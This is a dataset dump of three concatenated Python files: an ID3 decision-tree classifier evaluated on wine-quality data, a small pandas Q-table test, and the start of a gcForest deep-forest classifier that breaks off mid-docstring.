Function to compute expected entropy\ndef expected_entropy(data_left,data_right):\n p_left=float(len(data_left))/(len(data_left)+len(data_right))\n p_right=float(len(data_right))/(len(data_left)+len(data_right))\n exp_entropy=(p_left*data_entropy(data_left) + p_right*data_entropy(data_right))\n \n return exp_entropy\n# Function for information gain\ndef information_gain(data,data_left,data_right):\n e1=data_entropy(data)\n e2=expected_entropy(data_left,data_right)\n IG=e1-e2\n \n return IG\n# Function for splitting data to create binary tree\ndef create_data_split(data,split_col,split_val):\n split_col_values=data[:,split_col]\n data_left=data[split_col_values<=split_val]\n data_right=data[split_col_values>split_val]\n \n return data_left,data_right\n# Function to estimate best split decision, based on Information gain ID3 algorithm\ndef find_best_decision(data): \n split_choices={}\n \n for i in range(0,np.shape(data)[1]-1):\n split_choices[i]=[]\n unique_values=np.unique(data[:,i])\n for j in range(0,len(unique_values)):\n if(j!=0):\n val1=unique_values[j]\n val2=unique_values[j-1]\n split_val=(val1+val2)/2\n split_choices[i].append(split_val)\n\n IG=0\n \n for i in range(0,len(split_choices)):\n for j in split_choices[i]:\n data_left,data_right=create_data_split(data,i,j)\n IG_new=information_gain(data,data_left,data_right) \n if(IG_new>=IG):\n IG=IG_new\n best_split_col=i\n best_split_val=j\n \n return best_split_col,best_split_val\n# Confusion Matrix to calculate F1 score and accuracy results \ndef CM(Y_pred,Y_true):\n Con_Mat=np.zeros((11,11))\n TP=np.zeros(11)\n FP=np.zeros(11)\n FN=np.zeros(11)\n F=np.zeros(11)\n \n for i in range(0,len(Y_pred)):\n Con_Mat[int(Y_true[i])][int(Y_pred[i])]=Con_Mat[int(Y_true[i])][int(Y_pred[i])]+1\n \n for i in range(0,11):\n for j in range(0,11):\n if(i==j):\n TP[i]=Con_Mat[i][j]\n else:\n FN[i]=FN[i]+Con_Mat[i][j]\n FP[i]=FP[i]+Con_Mat[j][i]\n if(TP[i]==0):\n F[i]=0\n else:\n F[i]=2*TP[i]/float(2*TP[i]+FP[i]+FN[i])\n \n F1_Score=float(np.sum(F))/(len(np.unique(Y_true))) \n Accuracy=float(np.sum(TP))/(len(Y_pred))\n \n return Accuracy,F1_Score\n# Function to generate tree , used in training and testing \n# The hyper parameters, Max depth and min instance count\ndef create_decision_treeID3(data,min_instance_count=2,Max_Depth=11,depth_count=0):\n \n if((unique_data_labels(data))or(len(data)<min_instance_count)or(depth_count==Max_Depth)):\n predicted_label=classify_data_labels(data)\n return predicted_label\n \n else:\n depth_count=depth_count+1 \n bsplit_col,bsplit_val=find_best_decision(data)\n data_left,data_right=create_data_split(data,bsplit_col,bsplit_val)\n decision=\"{} <= {}\".format(bsplit_col,bsplit_val)\n sub_tree={decision:[]}\n \n left=create_decision_treeID3(data_left,min_instance_count,Max_Depth,depth_count)\n right=create_decision_treeID3(data_right,min_instance_count,Max_Depth,depth_count)\n \n if(left==right):\n sub_tree=left\n else:\n sub_tree[decision].append(left)\n sub_tree[decision].append(right)\n \n return sub_tree\n# Function for Making decision to classify example for an instance \ndef make_decision(x,tree):\n decision = list(tree.keys())[0]\n col_index, comparison_operator, value = decision.split(\" \")\n\n if(x[int(col_index)]<=float(value)):\n label=tree[decision][0]\n else:\n label=tree[decision][1]\n \n if not isinstance(label, dict):\n return label\n else:\n return make_decision(x,label)\n# Function to print final output after cross validation, similar to KNN, using Decision trees\ndef 
Final_Output_Test(X_train,X_test,K):\n X_val=X_train[0:np.shape(X_train)[0]/5]\n X_train=X_train[np.shape(X_train)[0]/5:np.shape(X_train)[0]]\n \n Y_train=X_train[:,11]\n Y_val=X_val[:,11]\n Y_test=X_test[:,11]\n \n Mean=X_train[:,0:11].mean(0)\n Std=X_train[:,0:11].std(0) \n X_train[:,0:11]=(X_train[:,0:11]-Mean)/Std\n X_val[:,0:11]=(X_val[:,0:11]-Mean)/Std\n X_test[:,0:11]=(X_test[:,0:11]-Mean)/Std\n \n for k in range(K,K+1):\n tree = create_decision_treeID3(X_train,min_instance_count=2,Max_Depth=k,depth_count=0)\n \n Y_pred=np.zeros(len(X_train))\n for i in range(0,len(X_train)):\n Y_pred[i]=make_decision(X_train[i],tree) \n \n TrAccuracy,TrF1_Score=CM(Y_pred,Y_train)\n \n Y_pred=np.zeros(len(X_val))\n for i in range(0,len(X_val)):\n Y_pred[i]=make_decision(X_val[i],tree) \n \n VAccuracy,VF1_Score=CM(Y_pred,Y_val)\n\n Y_pred=np.zeros(len(X_test))\n for i in range(0,len(X_test)):\n Y_pred[i]=make_decision(X_test[i],tree) \n \n TsAccuracy,TsF1_Score=CM(Y_pred,Y_test)\n\n return TsAccuracy,TsF1_Score,VAccuracy,VF1_Score,TrAccuracy,TrF1_Score \n \n# Function for Cross Validation, only parameter is Kmax- Max depth of Tree\ndef cross_validation_test(X_train,K_Max):\n X_val=X_train[0:np.shape(X_train)[0]/5]\n X_train=X_train[np.shape(X_train)[0]/5:np.shape(X_train)[0]]\n \n Y_train=X_train[:,11]# Splitting data\n Y_val=X_val[:,11]\n \n Mean=X_train[:,0:11].mean(0)# Normalizing data\n Std=X_train[:,0:11].std(0)\n X_train[:,0:11]=(X_train[:,0:11]-Mean)/Std\n X_val[:,0:11]=(X_val[:,0:11]-Mean)/Std \n \n Accuracy=np.zeros(K_Max+1)\n F1_Score=np.zeros(K_Max+1)\n \n for k in range(2,K_Max+1): # Cross Validation\n Y_pred=np.zeros(len(X_val)) # Generating tree command below with varying depth\n tree = create_decision_treeID3(X_train,min_instance_count=2,Max_Depth=k,depth_count=0)\n for i in range(0,len(X_val)):\n Y_pred[i]=make_decision(X_val[i],tree)\n \n Accuracy[k],F1_Score[k]=CM(Y_pred,Y_val) # Computin F1 score and accuracy\n \n print(\"The value of Max-Depth is %d .\" %(k))\n print(F1_Score[k])\n\n return Accuracy,F1_Score\n\n\nfile = open('winequality-white.csv')\n\ndata=[]\nTsAc=[]\nTsF1=[]\nVAc=[]\nVF1=[]\nTrAc=[]\nTrF1=[]\n\nfor row in file:\n a=row.split(';')\n data.append(a)\n\ndel data[0]\n\nX=np.asarray(data).astype('float')\n#np.random.seed(5)\nnp.random.shuffle(X)\n\nX_1=X[0:np.shape(X)[0]/4]\nX_2=X[np.shape(X)[0]/4:2*(np.shape(X)[0]/4)]\nX_3=X[2*(np.shape(X)[0]/4):3*(np.shape(X)[0]/4)]\nX_4=X[3*(np.shape(X)[0]/4):np.shape(X)[0]]\n\ntest=[X_1,X_2,X_3,X_4]\ntr1=np.concatenate((X_2,X_3,X_4),axis=0)\ntr2=np.concatenate((X_3,X_4,X_1),axis=0)\ntr3=np.concatenate((X_4,X_1,X_2),axis=0)\ntr4=np.concatenate((X_1,X_2,X_3),axis=0)\ntrain=[tr1,tr2,tr3,tr4] # Data split into folds for cross validation and testing\n\nK_best_final=14 # Best Max-Depth\n\nprint(\"Hyper-parameters:\")\nprint(\"Best Max-Depth in Fold: %d\" %(K_best_final))\n\nfor i in range(0,4):\n X_test=test[i]\n X_train=train[i]\n \n TsAccuracy,TsF1_Score,VAccuracy,VF1_Score,TrAccuracy,TrF1_Score=Final_Output_Test(X_train,X_test,K_best_final)\n TsAc.append(TsAccuracy)\n TsF1.append(TsF1_Score)\n VAc.append(VAccuracy)\n VF1.append(VF1_Score)\n TrAc.append(TrAccuracy)\n TrF1.append(TrF1_Score)\n\n print(\"Fold-%d:\" %(i+1))\n print(\"Training: F1 Score: %f , Accuracy: %f\" %(TrF1_Score,TrAccuracy))\n print(\"Validation: F1 Score: %f , Accuracy: %f\" %(VF1_Score,VAccuracy))\n print(\"Test: F1 Score: %f , Accuracy: %f\" %(TsF1_Score,TsAccuracy))\n \n\nprint(\"Average:\")\nprint(\"Training: F1 Score: %f , Accuracy: %f\" 
%(np.mean(TrF1),np.mean(TrAc)))\nprint(\"Validation: F1 Score: %f , Accuracy: %f\" %(np.mean(VF1),np.mean(VAc)))\nprint(\"Test: F1 Score: %f , Accuracy: %f\" %(np.mean(TsF1),np.mean(TsAc)))\n\n# Timing Metrics\n#end = time.time()\n#print(\"The time taken for the algorithm computation is :- %f seconds.\" % (end-start))\n\n#file = open('winequality-white.csv')\n#\n#data=[]\n#Ac=[]\n#F1=[]\n#\n#TsAc=[]\n#TsF1=[]\n#VAc=[]\n#VF1=[]\n#TrAc=[]\n#TrF1=[]\n#\n#for row in file:\n# a=row.split(';')\n# data.append(a)\n#\n#del data[0]\n#\n#X=np.asarray(data).astype('float')\n##np.random.seed(0)\n#np.random.shuffle(X)\n#\n#X_1=X[0:np.shape(X)[0]/4]\n#X_2=X[np.shape(X)[0]/4:2*(np.shape(X)[0]/4)]\n#X_3=X[2*(np.shape(X)[0]/4):3*(np.shape(X)[0]/4)]\n#X_4=X[3*(np.shape(X)[0]/4):np.shape(X)[0]]\n#\n#test=[X_1,X_2,X_3,X_4]\n#tr1=np.concatenate((X_2,X_3,X_4),axis=0)\n#tr2=np.concatenate((X_3,X_4,X_1),axis=0)\n#tr3=np.concatenate((X_4,X_1,X_2),axis=0)\n#tr4=np.concatenate((X_1,X_2,X_3),axis=0)\n#train=[tr1,tr2,tr3,tr4]\n#\n#for i in range(0,4):\n# X_test=test[i]\n# X_train=train[i]\n# \n# Accuracy,F1_Score=cross_validation_test(X_train,25)\n# K_best_fold=np.argmax(F1_Score)\n# print(\"The best value of Max-Depth is %d and fold number is %d.\" % (K_best_fold,i+1))\n# print(Accuracy[K_best_fold])\n# print(F1_Score[K_best_fold])\n#\n# x = np.arange(2,26, 1)\n# Accuracy=Accuracy[2:]\n# F1_Score=F1_Score[2:]\n# F1.append(F1_Score)\n# Ac.append(Accuracy)\n# \n# plt.figure(1)\n# plt.plot(x,Accuracy, label = \"fold %d\" %(i+1))\n# plt.figure(2)\n# plt.plot(x,F1_Score, label = \"fold %d\" %(i+1))\n# \n# TsAccuracy,TsF1_Score,VAccuracy,VF1_Score,TrAccuracy,TrF1_Score=Final_Output_Test(X_train,X_test,K_best_fold)\n# TsAc.append(TsAccuracy)\n# TsF1.append(TsF1_Score)\n# VAc.append(VAccuracy)\n# VF1.append(VF1_Score)\n# TrAc.append(TrAccuracy)\n# TrF1.append(TrF1_Score)\n#\n# print(\"Hyper-parameters:\")\n# print(\"Best Max-Depth in Fold: %d\" %(K_best_fold))\n#\n# print(\"Fold-%d:\" %(i+1))\n# print(\"Training: F1 Score: %f , Accuracy: %f\" %(TrF1_Score,TrAccuracy))\n# print(\"Validation: F1 Score: %f , Accuracy: %f\" %(VF1_Score,VAccuracy))\n# print(\"Test: F1 Score: %f , Accuracy: %f\" %(TsF1_Score,TsAccuracy))\n# \n# \n#print(\"Average:\")\n#print(\"Training: F1 Score: %f , Accuracy: %f\" %(np.mean(TrF1),np.mean(TrAc)))\n#print(\"Validation: F1 Score: %f , Accuracy: %f\" %(np.mean(VF1),np.mean(VAc)))\n#print(\"Test: F1 Score: %f , Accuracy: %f\" %(np.mean(TsF1),np.mean(TsAc)))\n# \n#\n#plt.figure(1)\n#plt.xlabel('K') \n## naming the y axis \n#plt.ylabel('Accuracy') \n## giving a title to my graph \n#plt.title('Accuracy vs K') \n## show a legend on the plot \n#plt.legend() \n## function to show the plot \n#plt.savefig('Accuracy.png')\n#\n#plt.figure(2)\n#plt.xlabel('K') \n## naming the y axis \n#plt.ylabel('F1 Score') \n## giving a title to my graph \n#plt.title('F1 Scores vs K') \n## show a legend on the plot \n#plt.legend() \n## function to show the plot \n#plt.savefig('F1_Score.png')\n#\n#pickle.dump(X, open( \"X_data_saved.p\", \"wb\" ) ) \n#pickle.dump(Ac, open( \"Ac_data_saved.p\", \"wb\" ) )\n#pickle.dump(F1, open( \"F1_data_saved.p\", \"wb\" ) )\n#\n#\n#end = time.time()\n#print(\"The time taken for the algorithm computation is :- %f seconds.\" % (end-start))\n","sub_path":"decisiontree.py.py","file_name":"decisiontree.py.py","file_ext":"py","file_size_in_byte":11889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"69668756","text":"import pandas as 
pd\r\nimport numpy as np\r\n\r\nactions = ['1','2','3','4']\r\n\r\nindexs = ['hand tiles', 'tile pile']\r\n\r\ncolu = indexs + actions\r\n# indexes = pd.MultiIndex.from_product([['midterm'],['language']])\r\n\r\n# columns = ['tom','jack','rose']\r\n# data = np.random.randint(0,150,size=(1,4))\r\n# q_table = pd.DataFrame(data=data,index=indexes,columns=actions)\r\n\r\nq_table = pd.DataFrame(columns=colu, dtype=np.float64)\r\n\r\nq_table = q_table.append(pd.Series(['1', '1', 0, 0, 0, 0], index=colu, name='1,2'))\r\n\r\nprint(q_table)\r\nprint(q_table.loc['1,2',:])\r\n#data = pd.Series(np.random.randn(10), index=[['x', 'x', 'x', 'x', 'x', 'x', 'y', 'y', 'y', 'y'], ['a', 'a', 'a', 'b', 'b', 'b', 'c', 'c', 'd', 'd'], [1, 2, 3, 1, 2, 3, 1, 2, 2, 3]])\r\n","sub_path":"majiang/pandas_test.py","file_name":"pandas_test.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"509371843","text":"#!/usr/bin/env python\nimport copy\nimport itertools\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import *\n\nfrom .estimators import classified_estimators\nfrom .kfold_wrapper import kfold_wrapper\n\nclass GCForestClassifier(classified_estimators):\n\n def __init__(self, shape_1X=None, n_mgsRFtree=30, window=None, stride=1,\n cascade_test_size=0.2, n_cascadeRF=2, n_cascadeRFtree=101, cascade_layer=np.inf,\n min_samples_mgs=0.1, min_samples_cascade=0.05, tolerance=0.0, \n cv_method='group', n_mgs_cv=10, n_cascade_cv=10, cv_mgs_valSize=0.2, cv_cascade_valSize=0.2, \n n_jobs=-1, scoring=None):\n \"\"\" GCForest Classifier.\n\n :param shape_1X: int or tuple list or np.array (default=None)\n Shape of a single sample element [n_lines, n_cols]. Required when calling mg_scanning!\n For sequence data a single int can be given.\n\n :param n_mgsRFtree: int (default=30)\n Number of trees in a Random Forest during Multi Grain Scanning.\n\n :param window: int (default=None)\n List of window sizes to use during Multi Grain Scanning.\n If 'None' no slicing will be done.\n\n :param stride: int (default=1)\n Step used when slicing the data.\n\n :param cascade_test_size: float or int (default=0.2)\n Split fraction or absolute number for cascade training set splitting.\n\n :param n_cascadeRF: int (default=2)\n Number of estimators in a cascade layer. 
\n Only useful when estimators can use out-of-bag samples.\n For each pseudo Random Forest a complete Random Forest is created, hence\n the total number of Random Forests in a layer will be 2*n_cascadeRF.\n\n :param n_cascadeRFtree: int (default=101)\n Number of trees in a single Random Forest in a cascade layer.\n \n :param cascade_layer: int (default=np.inf)\n Maximum number of cascade layers allowed.\n Useful to limit the construction of the cascade.\n \n :param min_samples_mgs: float or int (default=0.1)\n Minimum number of samples in a node to perform a split\n during the training of Multi-Grain Scanning Random Forest.\n If int, number_of_samples = int.\n If float, min_samples represents the fraction of the initial n_samples to consider.\n\n :param min_samples_cascade: float or int (default=0.05)\n Minimum number of samples in a node to perform a split\n during the training of Cascade Random Forest.\n If int, number_of_samples = int.\n If float, min_samples represents the fraction of the initial n_samples to consider.\n \n :param tolerance: float (default=0.0)\n Accuracy tolerance for the cascade growth.\n If the improvement in accuracy is not better than the tolerance, the construction is\n stopped.\n \n :param cv_method: str (default='group')\n The method of cross-validation.\n If 'group', CV will use LeaveOneGroupOut in sklearn.model_selection.\n If 'sequence', CV will be processed as time series.\n Other methods will be added in a new version.\n \n :param n_mgs_cv: int (default=10)\n Number of folds of CV in an estimator during Multi Grain Scanning.\n Only useful when the estimator can use out-of-bag samples.\n \n :param n_cascade_cv: int (default=10)\n Number of folds of CV in an estimator in a cascade layer.\n Only useful when the estimator can use out-of-bag samples.\n \n :param cv_mgs_valSize: float (default=0.2)\n During Multi Grain Scanning, the ratio of validation data in each member of the serial n_folds.\n The length of the validation set is rounded off.\n \n :param cv_cascade_valSize: float (default=0.2)\n In a cascade layer, the ratio of validation data in each member of the serial n_folds.\n The length of the validation set is rounded off.\n \n :param n_jobs: int (default=-1)\n The number of jobs to run in parallel for any Random Forest fit and predict.\n If -1, then the number of jobs is set to the number of cores.\n \n :param scoring: str (default=None)\n The method of score evaluation;\n classification metrics are used here.\n All scores have their best value at 1 and their worst at 0.\n In addition, you can input a score function that can be recognized by sklearn.\n \"\"\"\n \n setattr(self, 'shape_1X', shape_1X)\n setattr(self, 'n_layer', 0)\n setattr(self, '_n_samples', 0)\n setattr(self, 'n_cascadeRF', int(n_cascadeRF))\n if isinstance(window, int):\n setattr(self, 'window', [window])\n elif isinstance(window, list):\n setattr(self, 'window', window)\n elif window is None:\n setattr(self, 'window', window)\n else:\n raise ValueError('Param window cannot get ', window)\n setattr(self, 'stride', stride)\n setattr(self, 'cascade_test_size', cascade_test_size)\n setattr(self, 'n_mgsRFtree', int(n_mgsRFtree))\n setattr(self, 'n_cascadeRFtree', int(n_cascadeRFtree))\n setattr(self, 'cascade_layer', cascade_layer)\n setattr(self, 'min_samples_mgs', min_samples_mgs)\n setattr(self, 'min_samples_cascade', min_samples_cascade)\n setattr(self, 'tolerance', tolerance)\n setattr(self, 'n_jobs', n_jobs)\n \n super(GCForestClassifier, self).__init__(n_mgsRFtree=self.n_mgsRFtree, \n n_cascadeRFtree=self.n_cascadeRFtree, 
min_samples_mgs=self.min_samples_mgs, \n min_samples_cascade=self.min_samples_cascade, n_jobs=self.n_jobs)\n \n setattr(self, 'kfold_wrapper', kfold_wrapper)\n setattr(self, 'cv_method', cv_method)\n setattr(self, 'n_mgs_cv', int(n_mgs_cv))\n setattr(self, 'n_cascade_cv', int(n_cascade_cv))\n setattr(self, 'cv_mgs_valSize', cv_mgs_valSize)\n setattr(self, 'cv_cascade_valSize', cv_cascade_valSize)\n \n if scoring is None or scoring == 'accuracy':\n setattr(self, 'scoring', accuracy_score)\n elif scoring == 'balanced_accuracy':\n setattr(self, 'scoring', balanced_accuracy_score)\n elif scoring == 'average_precision':\n setattr(self, 'scoring', average_precision_score)\n elif scoring == 'brier_score_loss':\n setattr(self, 'scoring', brier_score_loss)\n elif scoring == 'f1':\n setattr(self, 'scoring', f1_score)\n elif scoring == 'precision':\n setattr(self, 'scoring', precision_score)\n elif scoring == 'recall':\n setattr(self, 'scoring', recall_score)\n elif scoring == 'roc_auc':\n setattr(self, 'scoring', roc_auc_score)\n else:\n setattr(self, 'scoring', scoring)\n \n\n def fit(self, X, y):\n \"\"\" Training the gcForest on input data X and associated target y.\n\n :param X: np.array\n Array containing the input samples.\n Must be of shape [n_samples, data] where data is a 1D array.\n\n :param y: np.array\n 1D array containing the target values.\n Must be of shape [n_samples]\n \"\"\"\n if np.shape(X)[0] != len(y):\n raise ValueError('Sizes of y and X do not match.')\n\n mgs_X = self.mg_scanning(X, y)\n _ = self.cascade_forest(mgs_X, y)\n\n def predict_proba(self, X):\n \"\"\" Predict the class probabilities of unknown samples X.\n\n :param X: np.array\n Array containing the input samples.\n Must be of the same shape [n_samples, data] as the training inputs.\n\n :return: np.array\n 1D array containing the predicted class probabilities for each input sample.\n \"\"\"\n mgs_X = self.mg_scanning(X)\n cascade_all_pred_prob = self.cascade_forest(mgs_X)\n predict_proba = np.mean(cascade_all_pred_prob, axis=0)\n\n return predict_proba\n\n def predict(self, X):\n \"\"\" Predict the class of unknown samples X.\n\n :param X: np.array\n Array containing the input samples.\n Must be of the same shape [n_samples, data] as the training inputs.\n\n :return: np.array\n 1D array containing the predicted class for each input sample.\n \"\"\"\n pred_proba = self.predict_proba(X=X)\n predictions = np.argmax(pred_proba, axis=1)\n\n return predictions\n\n def mg_scanning(self, X, y=None):\n \"\"\" Performs a Multi Grain Scanning on input data.\n\n :param X: np.array\n Array containing the input samples.\n Must be of shape [n_samples, data] where data is a 1D array.\n\n :param y: np.array (default=None)\n\n :return: np.array\n Array of shape [n_samples, .. 
] containing Multi Grain Scanning sliced data.\n \"\"\"\n setattr(self, '_n_samples', np.shape(X)[0])\n shape_1X = getattr(self, 'shape_1X')\n if isinstance(shape_1X, int):\n shape_1X = [1,shape_1X]\n if not getattr(self, 'window'):\n setattr(self, 'window', [shape_1X[1]])\n\n mgs_pred_prob = []\n\n for wdw_size in getattr(self, 'window'):\n wdw_pred_prob = self.window_slicing_pred_prob(X, wdw_size, shape_1X, y=y)\n mgs_pred_prob.append(wdw_pred_prob)\n\n return np.concatenate(mgs_pred_prob, axis=1)\n\n def window_slicing_pred_prob(self, X, window, shape_1X, y=None):\n \"\"\" Performs a window slicing of the input data and send them through Estimators.\n If target values 'y' are provided sliced data are then used to train the Estimators.\n\n :param X: np.array\n Array containing the input samples.\n Must be of shape [n_samples, data] where data is a 1D array.\n\n :param window: int\n Size of the window to use for slicing.\n\n :param shape_1X: list or np.array\n Shape of a single sample.\n\n :param y: np.array (default=None)\n Target values. If 'None' no training is done.\n\n :return: np.array\n Array of size [n_samples, ..] containing the Random Forest.\n prediction probability for each input sample.\n \"\"\"\n stride = getattr(self, 'stride')\n\n if shape_1X[0] > 1:\n print('Slicing Images...')\n sliced_X, sliced_y = self._window_slicing_img(X, window, shape_1X, y=y, stride=stride)\n else:\n print('Slicing Sequence...')\n sliced_X, sliced_y = self._window_slicing_sequence(X, window, shape_1X, y=y, stride=stride)\n \n mgs_list, mgs_estimators, mgs_OOB = self.get_mgs_estimators()\n for i, mgs in enumerate(mgs_list):\n if y is not None:\n #the estimator must has sklearn API,and can work with function predict, predict_proba\n estimator = mgs_estimators[mgs]\n print('Training MGS Model: ', mgs)\n \n if mgs_OOB[mgs]:\n estimator.fit(sliced_X, sliced_y)\n setattr(self, '_mgs%s_%d'%(mgs, window), copy.deepcopy(estimator))\n pred_prob_est = estimator.oob_decision_function_\n elif not mgs_OOB[mgs]:\n estimator_cv = self.kfold_wrapper(estimator, est_fun='class', n_folds=self.n_mgs_cv, \n fold_method=self.cv_method, val_size=self.cv_mgs_valSize) \n estimator_cv.fit(sliced_X, sliced_y)\n setattr(self, '_mgs%s_%d'%(mgs, window), copy.deepcopy(estimator_cv.estimator))\n pred_prob_est = estimator_cv.cv_pred_prob\n \n if hasattr(self, '_mgs%s_%d'%(mgs, window)) and y is None:\n estimator = getattr(self, '_mgs%s_%d'%(mgs, window))\n pred_prob_est = estimator.predict_proba(sliced_X)\n \n if i==0:\n pred_prob = pred_prob_est\n elif i>0:\n pred_prob = np.c_[pred_prob, pred_prob_est]\n \n return pred_prob.reshape([getattr(self, '_n_samples'), -1])\n\n def _window_slicing_img(self, X, window, shape_1X, y=None, stride=1):\n \"\"\" Slicing procedure for images\n\n :param X: np.array\n Array containing the input samples.\n Must be of shape [n_samples, data] where data is a 1D array.\n\n :param window: int\n Size of the window to use for slicing.\n\n :param shape_1X: list or np.array\n Shape of a single sample [n_lines, n_cols].\n\n :param y: np.array (default=None)\n Target values.\n\n :param stride: int (default=1)\n Step used when slicing the data.\n\n :return: np.array and np.array\n Arrays containing the sliced images and target values (empty if 'y' is None).\n \"\"\"\n if any(s < window for s in shape_1X):\n raise ValueError('window must be smaller than both dimensions for an image')\n\n len_iter_x = np.floor_divide((shape_1X[1] - window), stride) + 1\n len_iter_y = np.floor_divide((shape_1X[0] - window), 
stride) + 1\n iterx_array = np.arange(0, stride*len_iter_x, stride)\n itery_array = np.arange(0, stride*len_iter_y, stride)\n\n ref_row = np.arange(0, window)\n ref_ind = np.ravel([ref_row + shape_1X[1] * i for i in range(window)])\n inds_to_take = [ref_ind + ix + shape_1X[1] * iy\n for ix, iy in itertools.product(iterx_array, itery_array)]\n\n sliced_imgs = np.take(X, inds_to_take, axis=1).reshape(-1, window**2)\n\n if y is not None:\n sliced_target = np.repeat(y, len_iter_x * len_iter_y)\n elif y is None:\n sliced_target = None\n\n return sliced_imgs, sliced_target\n\n def _window_slicing_sequence(self, X, window, shape_1X, y=None, stride=1):\n \"\"\" Slicing procedure for sequences (aka shape_1X = [.., 1]).\n\n :param X: np.array\n Array containing the input samples.\n Must be of shape [n_samples, data] where data is a 1D array.\n\n :param window: int\n Size of the window to use for slicing.\n\n :param shape_1X: list or np.array\n Shape of a single sample [n_lines, n_col].\n\n :param y: np.array (default=None)\n Target values.\n\n :param stride: int (default=1)\n Step used when slicing the data.\n\n :return: np.array and np.array\n Arrays containing the sliced sequences and target values (empty if 'y' is None).\n \"\"\"\n if shape_1X[1] < window:\n raise ValueError('window must be smaller than the sequence dimension')\n\n len_iter = np.floor_divide((shape_1X[1] - window), stride) + 1\n iter_array = np.arange(0, stride*len_iter, stride)\n\n ind_1X = np.arange(np.prod(shape_1X))\n inds_to_take = [ind_1X[i:i+window] for i in iter_array]\n sliced_sqce = np.take(X, inds_to_take, axis=1).reshape(-1, window)\n\n if y is not None:\n sliced_target = np.repeat(y, len_iter)\n elif y is None:\n sliced_target = None\n\n return sliced_sqce, sliced_target\n\n def cascade_forest(self, X, y=None):\n \"\"\" Perform (or train if 'y' is not None) a cascade forest estimator or other customer estimators.\n\n :param X: np.array\n Array containing the input samples.\n Must be of shape [n_samples, data] where data is a 1D array.\n\n :param y: np.array (default=None)\n Target values. 
If 'None' perform prediction.\n\n :return: np.array\n 1D array containing the predicted class for each input sample.\n \"\"\"\n if y is not None:\n setattr(self, 'n_layer', 0)\n test_size = getattr(self, 'cascade_test_size')\n max_layers = getattr(self, 'cascade_layer')\n tol = getattr(self, 'tolerance')\n\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=test_size)\n\n self.n_layer += 1\n #print('n_layer: ', self.n_layer, ' ', 'X_train shape: ', X_train.shape)\n prf_crf_pred_ref = self._cascade_layer(X_train, y_train)\n #print('n_layer: ', self.n_layer, ' ', 'prf_crf_pred_ref length: ', len(prf_crf_pred_ref))\n accuracy_ref = self._cascade_evaluation(X_test, y_test)\n feat_arr = self._create_feat_arr(X_train, prf_crf_pred_ref)\n #print('n_layer: ', self.n_layer, ' ', 'feat_arr shape: ', feat_arr.shape)\n \n self.n_layer += 1\n prf_crf_pred_layer = self._cascade_layer(feat_arr, y_train)\n #print('n_layer: ', self.n_layer, ' ', 'prf_crf_pred_layer length: ', len(prf_crf_pred_layer))\n accuracy_layer = self._cascade_evaluation(X_test, y_test)\n\n while accuracy_layer > (accuracy_ref + tol) and self.n_layer <= max_layers:\n accuracy_ref = accuracy_layer\n prf_crf_pred_ref = prf_crf_pred_layer\n feat_arr = self._create_feat_arr(X_train, prf_crf_pred_ref)\n self.n_layer += 1\n prf_crf_pred_layer = self._cascade_layer(feat_arr, y_train)\n accuracy_layer = self._cascade_evaluation(X_test, y_test)\n\n if accuracy_layer < accuracy_ref:\n n_cascadeRF = getattr(self, 'n_cascadeRF')\n cas_list, _, cas_OOB = self.get_cascade_estimators()\n for irf in range(n_cascadeRF):\n for i, cas in enumerate(cas_list):\n if cas_OOB[cas]:\n delattr(self, '_cas%s_%d_%d'%(cas, self.n_layer, irf))\n elif not cas_OOB[cas] and irf==0:\n delattr(self, '_cas%s_%d_%d'%(cas, self.n_layer, irf))\n self.n_layer -= 1\n\n elif y is None:\n at_layer = 1\n prf_crf_pred_ref = self._cascade_layer(X, layer=at_layer)\n while at_layer < getattr(self, 'n_layer'):\n at_layer += 1\n feat_arr = self._create_feat_arr(X, prf_crf_pred_ref)\n prf_crf_pred_ref = self._cascade_layer(feat_arr, layer=at_layer)\n\n return prf_crf_pred_ref\n\n def _cascade_layer(self, X, y=None, layer=0):\n \"\"\" Cascade layer containing Random Forest or/and other estimators.\n If y is not None the layer is trained.\n\n :param X: np.array\n Array containing the input samples.\n Must be of shape [n_samples, data] where data is a 1D array.\n\n :param y: np.array (default=None)\n Target values. If 'None' perform prediction.\n\n :param layer: int (default=0)\n Layer index. 
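Ignored when training. 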
Used to call the previously trained layer.\n\n :return: list\n List containing the prediction probabilities for all samples.\n \"\"\"\n \n n_cascadeRF = getattr(self, 'n_cascadeRF')\n \n cas_list, cas_estimators, cas_OOB = self.get_cascade_estimators()\n prf_crf_pred = []\n if y is not None:\n print('Adding/Training Layer, n_layer={}'.format(self.n_layer))\n \n for irf in range(n_cascadeRF):\n for i, cas in enumerate(cas_list):\n estimator = cas_estimators[cas]\n \n if cas_OOB[cas]:\n estimator.fit(X, y)\n setattr(self, '_cas%s_%d_%d'%(cas, self.n_layer, irf), copy.deepcopy(estimator))\n prf_crf_pred.append(estimator.oob_decision_function_)\n elif not cas_OOB[cas] and irf==0:\n estimator_cv = self.kfold_wrapper(estimator, est_fun='class', n_folds=self.n_cascade_cv, \n fold_method=self.cv_method, val_size=self.cv_cascade_valSize)\n estimator_cv.fit(X, y)\n setattr(self, '_cas%s_%d_%d'%(cas, self.n_layer, irf), copy.deepcopy(estimator_cv.estimator))\n prf_crf_pred.append(estimator_cv.cv_pred_prob)\n \n elif y is None:\n for irf in range(n_cascadeRF):\n for i, cas in enumerate(cas_list):\n if cas_OOB[cas]:\n estimator = getattr(self, '_cas%s_%d_%d'%(cas, layer, irf))\n prf_crf_pred.append( estimator.predict_proba(X) )\n elif not cas_OOB[cas] and irf==0:\n estimator = getattr(self, '_cas%s_%d_%d'%(cas, layer, irf))\n prf_crf_pred.append( estimator.predict_proba(X) )\n \n return prf_crf_pred\n\n def _cascade_evaluation(self, X_test, y_test):\n \"\"\" Evaluate the accuracy of the cascade using X and y.\n\n :param X_test: np.array\n Array containing the test input samples.\n Must be of the same shape as training data.\n\n :param y_test: np.array\n Test target values.\n\n :return: float\n the cascade accuracy.\n \"\"\"\n casc_pred_prob = np.mean(self.cascade_forest(X_test), axis=0)\n casc_pred = np.argmax(casc_pred_prob, axis=1)\n casc_accuracy = self.scoring(y_test, casc_pred)\n print('Layer validation accuracy = {}'.format(casc_accuracy))\n\n return casc_accuracy\n\n def _create_feat_arr(self, X, prf_crf_pred):\n \"\"\" 